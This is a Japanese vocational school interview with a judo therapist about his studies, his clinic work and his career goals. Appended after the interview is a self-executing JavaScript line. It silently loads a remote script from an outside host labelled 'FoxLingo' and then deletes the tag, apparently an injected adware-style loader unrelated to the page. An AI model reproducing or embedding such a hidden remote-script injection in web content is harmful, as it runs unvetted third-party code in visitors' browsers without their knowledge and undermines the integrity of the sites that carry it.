柔道整復師 富岡 さん

P1501

自分の手で患者さんを治せる魅力的な仕事。

Profile
柔道整復師 富岡 さん
山崎整骨院 勤務
平成21年3月 柔道整復科Ⅱ部(夜間)卒業
奈良産業大学 出身

Qaq 柔道整復師を目指したきっかけ

Qaa もともと野球をしていたことで、ケガなどを見る機会が多く、野球のサポートをしたいと強く思っていました。スポーツトレーナーの勉強がしたいと思い京都医健に見学に行った際、柔道整復師は治療もトレーナー活動もできることを知り目指すこととなりました。

Qaq 京都医健での3年間

Qaa 一番思い出に残っているのは、テスト前のクラスメイトが集まっての勉強会ですね。実技テストの時は練習をたくさんしたのを憶えています。毎学期テストが終わるとクラスで打ち上げをしたり、学園祭にも毎年参加したりと、とても仲良くクラスで盛り上がったのは何よりの思い出となっています。
また、3年生から柔道整復の実技と座学を教えていただいた露久保先生との出会いによって今の自分があると言っても過言ではないです。臨床現場に近い授業内容で接骨院での症例を映像で見たり、手技・整復も動画で見られたりしたことが今に活きています。
在学中は仕事をしていましたが、学校に通うことを最優先して、定時で就業できる事務職を選択したので、両立することができました。

Qaq 現在の仕事について

Qaa 就職先を決めるにあたってはキャリアセンターの先生に相談し、接骨院見学をさせていただき、とても役に立ちました。色々なところへ見学に行って見比べることで、求人票や面接・説明だけでは分からない部分を知ることができました。
仕事内容としては新しい患者さまの問診・それに応じた治療・手技・機器操作・リハビリやストレッチと傷害予防を行っています。患者さまから「良くなったよ」と言っていただけたら嬉しいですし、さらに良くしたいと思います。

Qaq 柔道整復師を目指す方へメッセージ

Qaa 自分の手で患者さまを治せる柔道整復師はとても魅力的な仕事です。さらに自分で開業ができるのもポイントです。やる気と向上心があればどなたでもできると思います。人と関わって仕事をするのが好きな方は向いています。年齢は関係ないです。同級生でも60歳の方がおられましたから(笑)。

Qaq 今後の目標は

Qaa 手技などの技術や知識をさらにレベルアップしながら、このグループで院長を任せられることが当分の目標です。さらに将来的には自分で開業したいと思っています。

!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();